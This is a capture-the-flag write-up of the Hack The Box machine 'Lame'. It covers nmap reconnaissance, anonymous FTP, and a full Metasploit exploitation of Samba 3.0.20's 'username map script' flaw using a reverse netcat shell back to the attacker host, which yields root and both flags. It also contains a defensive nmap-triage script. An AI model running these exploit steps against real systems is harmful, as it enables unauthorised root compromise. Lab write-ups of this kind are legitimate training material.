Lame has been Pwned!


I’m back once again doing Hack The Box machines. I have recently hacked all the Starting Point machines and am now moving on to the Beginner track. I’ve written a post on my experience with the Starting Point machines, which you can read here.

Reconnaissance

The machine I’m going to be looking at today, and the first machine in the Beginner Track, is Lame. As always, we start by checking whether the box is online and responding to pings.

[10.10.14.84]─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ping 10.129.81.166 | tee -a ping ping.lame.txt
[sudo] password for joe:
PING 10.129.81.166 (10.129.81.166) 56(84) bytes of data.
64 bytes from 10.129.81.166: icmp_seq=1 ttl=63 time=21.4 ms
64 bytes from 10.129.81.166: icmp_seq=2 ttl=63 time=20.4 ms

As you can see, the box is responding, which means it’s safe to go ahead and run an nmap scan. I tell nmap to run its default safe scripts (-sC), version detection (-sV) and operating system identification (-O) on all ports (-p0-). You can see the specific command and the output below.

[10.10.14.84]─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.129.81.166 | tee -a nmap.lame.txt
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.84
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-09-15T14:40:20-04:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40068/tcp): CLEAN (Timeout)
|   Check 2 (port 45806/tcp): CLEAN (Timeout)
|   Check 3 (port 54683/udp): CLEAN (Timeout)
|   Check 4 (port 34973/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h59m26s, deviation: 2h49m56s, median: -43s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.

I’ve snipped out a bunch of the output we don’t need to see and have highlighted the areas which I think are of interest. Going down the list of results, I see that port 21 (FTP) is open and is allowing anonymous logins. The first thing I did was to log in and check whether there were any files on there.
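To show how the findings in the scan above can be pulled out automatically, here is an added triage script (my own example, not part of the original post) that parses nmap’s normal text output and maps the service versions and script results this walkthrough cares about to a finding and a fix. The sample input is a constructed copy of the scan shown above, and the rule table is mine.

```python
import re

# Constructed sample modelled on the nmap output shown above (not a live capture).
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Rule table (assumption: my own, limited to what this scan surfaces):
# (service name, version regex, severity, finding and remediation).
VERSION_RULES = [
    ("ftp", r"vsftpd 2\.3\.4\b", "high",
     "vsftpd 2.3.4: backdoored release (CVE-2011-2523); upgrade the package"),
    ("netbios-ssn", r"Samba smbd 3\.0\.20\b", "critical",
     "Samba 3.0.20: 'username map script' RCE; upgrade and drop the directive"),
    ("distccd", r".*", "high",
     "distccd exposed to the network: restrict to an allow-list or firewall it"),
]
# Script-output rules are matched against the whole scan text.
SCRIPT_RULES = [
    (r"ftp-anon: Anonymous FTP login allowed", "medium",
     "anonymous FTP enabled: set anonymous_enable=NO in vsftpd.conf"),
    (r"message_signing: disabled", "medium",
     "SMB signing disabled: set 'server signing = mandatory' in smb.conf"),
]

def parse_open_ports(text):
    """Return [(port, proto, service, version)] for every 'open' port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()))
    return ports

def triage(text):
    """Return [(port or None, severity, finding)] ordered critical -> medium."""
    order = {"critical": 0, "high": 1, "medium": 2}
    findings = []
    for port, _proto, service, version in parse_open_ports(text):
        for svc, pattern, sev, msg in VERSION_RULES:
            if service == svc and re.search(pattern, version):
                findings.append((port, sev, msg))
    for pattern, sev, msg in SCRIPT_RULES:
        if re.search(pattern, text):
            findings.append((None, sev, msg))
    return sorted(findings, key=lambda f: order[f[1]])
```

Note that the port 139 line reports only "3.X - 4.X", so the Samba rule fires on port 445, where nmap recovered the exact version.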

[10.10.14.84]─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ftp 10.129.81.166
Connected to 10.129.81.166.
220 (vsFTPd 2.3.4)
Name (10.129.81.166:joe): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

As you can see, there wasn’t anything interesting. I know that vsftpd 2.3.4 has CVE-2011-2523 associated with it, which is a backdoor. The backdoor is triggered by logging in with a smiley face, after which it grants access. I attempted to do this but had no luck. I used the Metasploit module but that didn’t work either, so it’s safe to say it’s patched. Moving on.

Foothold Hack

So from here we move on to the next ports in the list, 139 and 445 (Samba). I can see that the version of Samba is 3.0.20, so let’s check SearchSploit to see whether there are any known vulnerabilities for this particular version.

[10.10.14.84]─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo searchsploit Samba 3.0.20
--------------------------------------------------------------------------------- ---------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                           | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                             | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                     | linux_x86/dos/36741.py
--------------------------------------------------------------------------------- ---------------------------

As you can see from the output above, there is a command execution vulnerability for this version, and there is a Metasploit module for it. Let’s launch Metasploit (using msfconsole) and see if we can find and use the module.

msf6 > search samba 3.0.20
Matching Modules
================
   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

OK, we have found the exploit; we can select it by running ‘use 0’. Once the module is loaded we can run ‘options’ to see which options we need to populate.

msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.129.81.166    yes       The target host(s), range CIDR identifier, 
   RPORT   139              yes       The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.84      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic

It looks like we only have to set the RHOSTS option. RHOSTS is the setting used to declare the IP address of the remote host. RPORT is the remote port; as you can see, it is targeting port 139. The LHOST and LPORT options are our local IP address and port, which we want the target machine to connect back to. With all that configured, let’s run the ‘exploit’ command and see if it creates a session.

msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Command shell session 1 opened (10.10.14.84:4444 -> 10.129.81.166:34291) at 2021-09-15 20:06:43 +0100
whoami
root

Hallelujah, praise the hack gods. Metasploit successfully created a session on the remote machine, and not only that, it looks like we are root too. That means no privilege escalation is required on this machine. Let’s grab the root flag.

cat /root/root.txt
f40--------haXez--------712

We still have to submit the user flag, so we need to go hunting for it. Let’s check the home directory and see whether there are any users and whether any of them are hiding the user flag.

ls /home
ftp
makis
service
user
ls /home/makis
user.txt
cat /home/makis/user.txt
8af--------haXez--------3fb